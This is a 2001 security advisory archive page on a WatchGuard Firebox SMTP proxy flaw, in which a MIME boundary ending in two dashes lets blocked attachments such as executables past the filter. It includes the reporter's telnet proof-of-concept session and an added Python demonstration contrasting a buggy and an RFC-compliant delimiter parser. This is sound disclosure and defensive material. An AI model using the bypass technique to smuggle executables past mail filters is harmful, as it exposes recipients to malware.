SecurityTracker.com
SecurityTracker Archives
Category:   Device (Firewall)  >   Firebox Series (WatchGuard)
Vendors:   WatchGuard
(WatchGuard Issues Fix) Re: WatchGuard Firebox Firewall SMTP Proxy Fails to Block E-mail Based Executables and Scripts in Certain Conditions
SecurityTracker Alert ID:  1001875
SecurityTracker URL:  http://securitytracker.com/id/1001875
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 29 2001
Impact:   Host/resource access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 4.5, 4.6
Description:   It is reported that the WatchGuard Firebox SMTP Proxy fails to properly block certain MIME attachments when configured to block them. This allows a remote user to pass a potentially hazardous e-mail attachment through the firewall.

The firewall reportedly includes an SMTP proxy that allows for the blocking of e-mail attachments by MIME type and by file extension. It is reported that, under certain conditions, this feature will fail to properly block the attachments.

The vulnerability is believed to be due to improper identification of e-mail attachments when the MIME boundary contains certain characters. If the MIME boundary ends with two dashes, the vulnerability can reportedly be triggered.

Some example exploit configurations are included in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can send a potentially hazardous e-mail attachment through the firewall even if the firewall is configured to block the attachment.
Solution:   Upgrade to 4.61.
Vendor URL:  www.watchguard.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  
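The failure the advisory describes is a delimiter-classification mistake: a scanner that decides "this line closes the multipart body" by testing whether a delimiter line ends in "--" is fooled by a boundary that itself ends in "--", because the first part delimiter then already looks like the close delimiter and no part is ever inspected. The Python below is an added example (not WatchGuard's code and not from the source message): it builds the two messages from the reporter's telnet transcript with a constructed placeholder payload in place of the executable, runs them through a naive scanner that reproduces the bug and through an exact-match scanner that follows RFC 2046 section 5.1.1, and shows the resulting filter decision. The function names, the blocked-extension list and the filter policy are assumptions for illustration.

```python
"""Boundary-delimiter handling in an SMTP attachment filter.

Added example, not WatchGuard code. naive_classify() reproduces the
mistake described in the advisory; strict_classify() compares delimiter
lines exactly, as RFC 2046 section 5.1.1 defines them.
"""
import base64
import os
import re

# Assumed filter policy (hypothetical list): block attachments by extension.
BLOCKED_EXTENSIONS = {".exe", ".vbs", ".scr", ".pif"}

BOUNDARY_RE = re.compile(r'boundary="?([^";\s]+)"?', re.IGNORECASE)
FILENAME_RE = re.compile(r'filename="?([^";\r\n]+)"?', re.IGNORECASE)


def build_message(boundary):
    """Construct a one-part multipart/mixed body shaped like the reporter's
    telnet transcript. The payload is a constructed placeholder string, not
    an executable; the close delimiter is included as RFC 2046 requires."""
    payload = base64.b64encode(b"constructed placeholder payload").decode()
    return (
        f'Content-Type: multipart/mixed; boundary="{boundary}"\r\n'
        "\r\n"
        f"--{boundary}\r\n"
        'Content-Type: application/octet-stream; filename="Calc.exe"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        'Content-Disposition: attachment; filename="Calc.exe"\r\n'
        "\r\n"
        f"{payload}\r\n"
        f"--{boundary}--\r\n"
    )


def naive_classify(line, boundary):
    """Buggy delimiter test: prefix match, then 'ends with --' means close.
    For boundary "--sugus--" the first part delimiter "----sugus--" already
    ends in "--", so the scanner believes the multipart body has ended
    before any part was seen."""
    if not line.startswith("--" + boundary):
        return None
    return "close" if line.endswith("--") else "part"


def strict_classify(line, boundary):
    """RFC 2046 delimiters: exactly "--" + boundary (part) or
    "--" + boundary + "--" (close), optionally followed by whitespace.
    Exact comparison means a boundary that itself ends in "--" is harmless."""
    stripped = line.rstrip(" \t")
    if stripped == "--" + boundary + "--":
        return "close"
    if stripped == "--" + boundary:
        return "part"
    return None


def scan_parts(raw, classify):
    """Return the raw header block of every body part found by `classify`."""
    boundary = BOUNDARY_RE.search(raw).group(1)
    parts, current, in_headers = [], None, False
    for line in raw.split("\r\n"):
        kind = classify(line, boundary)
        if kind == "close":
            break
        if kind == "part":
            current, in_headers = [], True
            parts.append(current)
        elif in_headers:
            if line == "":
                in_headers = False  # blank line ends the part's headers
            else:
                current.append(line)
    return ["\r\n".join(p) for p in parts]


def filter_decision(raw, classify):
    """'blocked' if any part advertises a blocked filename extension."""
    for headers in scan_parts(raw, classify):
        match = FILENAME_RE.search(headers)
        if match and os.path.splitext(match.group(1))[1].lower() in BLOCKED_EXTENSIONS:
            return "blocked"
    return "allowed"


if __name__ == "__main__":
    for boundary in ("sugus", "--sugus--"):
        msg = build_message(boundary)
        print(f'boundary="{boundary}": naive={filter_decision(msg, naive_classify)} '
              f"strict={filter_decision(msg, strict_classify)}")
```

Two design points follow from the example. Rejecting boundaries that end in "--" is not a valid fix, because RFC 2046 allows "-" anywhere in a boundary, so the filter must compare delimiter lines exactly rather than by prefix and suffix. A filter of this kind should also fail closed: a multipart body that yields zero parts yet carries non-blank content after its headers has been parsed inconsistently with what the receiving mail client will do, and should be treated as a blocked or quarantined message rather than passed through.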

Message History:   This archive entry is a follow-up to the message listed below.
Jun 9 2001 WatchGuard Firebox Firewall SMTP Proxy Fails to Block E-mail Based Executables and Scripts in Certain Conditions



 Source Message Contents

Date:  Thu, 28 Jun 2001 15:00:46 -0700
Subject:  RE: WatchGuard SMTP Proxy issue


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On June 8, Dante Mercurio sent word of a bug (below) in the WatchGuard
SMTP proxy originally reported to the WG-Users list by Thomas Boll.
MIME type filtering could be bypassed if an attachment was encoded
with base64 encoding and two dashes were appended to the MIME boundary
specifier. This bug has been fixed for the latest version of the code
(4.61). All current LiveSecurity subscribers can go to
http://www.watchguard.com/support to obtain the service pack that
addresses this bug (4.61 SP1). 


Sincerely, 
Steve Fallin
Director, Rapid Response Team
WatchGuard Technologies, Inc. 

- -----Original Message-----
From: Dante Mercurio [mailto:dmercurio@ccgsecurity.com]
Sent: Friday, June 08, 2001 1:27 PM
To: BUGTRAQ@securityfocus.com
Subject: WatchGuard SMTP Proxy issue


The WatchGuard firebox has an SMTP proxy that allows for the exclusion
of attachments by MIME type and by file extension. It has been found
that under certain conditions, this feature can be overridden, allowing
files such as executables and VB script through the filter.

A customer of mine originally reported a problem on 12/19/00 with
WatchGuard case #255345. This was on version 4.5 of their LiveSecurity
software. On 5/27/01 Thomas Boll sent the following to the WG support
forum:

> -----Original Message-----
> From: Thomas Boll [mailto:tb@boll.ch]
> Sent: Sunday, May 27, 2001 7:13 PM
> To: 'wg-users@watchguard.com'
> Cc: 'krol@ssr.ch'
> Subject: [WG-Users] SMTP Vulnerability!
> 
> 
> Hi List
> 
> Users have reported that attachments blocked by file extension
> make it through the SMTP Proxy even if the file extension is
> on the blocked list (WG 4.6).
> 
> After some testing I believe that the MIME boundary is responsible
> for the SMTP Proxy to fail. If the MIME boundary ends in two dashes
> the Proxy will not correctly identify the attachment. This seems to
> be typical for FreeBSD based systems. This behaviour can be simply
> tested on any firewall using the SMTP Proxy denying some attachments
> based on the filename. Consider the two examples at the end
> of this message.
> 
> The reason seems to be obvious, two dashes end the MIME container,
> which leads to a misinterpretation of the SMTP proxy.
> 
> Regards
> Thomas
> 
> =======================================================================
> 
> # telnet smtpserv 25
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xx.
> Escape character is '^]'.
> 220 SMTP service ready
> helo mydomain.com
> 250 Requested mail action okay, completed
> mail from: me@mydomain.com
> 250 Requested mail action okay, completed
> rcpt to: me@smtpserv.mydomain.com
> 250 Requested mail action okay, completed
> data
> 354 Start mail input; end with <CRLF>.<CRLF>
> Content-Type: multipart/mixed; boundary="--sugus"
> 
> ----sugus
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
> 
> =====> THE ANSWER IS CORRECT AS IN:
> ---------------------------------------------------------------
> From me@mydomain.com  Mon May 28 00:46:37 2001
> Return-Path: <me@mydomain.com>
> Delivered-To: me@smptserv.mydomain.com
> Content-Type: multipart/mixed; boundary="--sugus"
> Date: Mon, 28 May 2001 00:45:54 +0200 (CEST)
> From: mw@mydomain.com
> 
> ----sugus
> Content-Type: text/plain; charset=us-ascii
> 
> [Attachment denied by WatchGuard SMTP proxy (type 
> "application/octet-stream", filename "Calc.exe")]
> 
> 
> ==========================================================================
> If however the boundary ends in --, the check will fail:
> 
> 
> .....
> Content-Type: multipart/mixed; boundary="--sugus--"
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
>   
> 
> THE RESULT IS WRONG NOW:
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> ...
> 
> ==========================================================================
> For help or to subscribe/unsubscribe, send mail to:
> wg-users-request@watchguard.com, with the word "subscribe", "unsubscribe"
> or "help" in the body of the message.
> 

Versions 4.5 and 4.6 have been tested and confirmed vulnerable. It is
unknown if other versions are vulnerable also.

M. Dante Mercurio, CCNA, MCSE+I, CCSA
Consulting Services Manager
Continental Consulting Group, LLC
http://www.ccgsecurity.com
dmercurio@ccgsecurity.com

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQA/AwUBOzupGk3Vi9lbkWzpEQLFdgCfR0ND15usVKG2aUC3e+0j8IBqU5gAn0j5
IIuHEp+UNN2GAejfeKB6K9Nd
=T9X0
-----END PGP SIGNATURE-----

 
 


Copyright 2012, SecurityGlobal.net LLC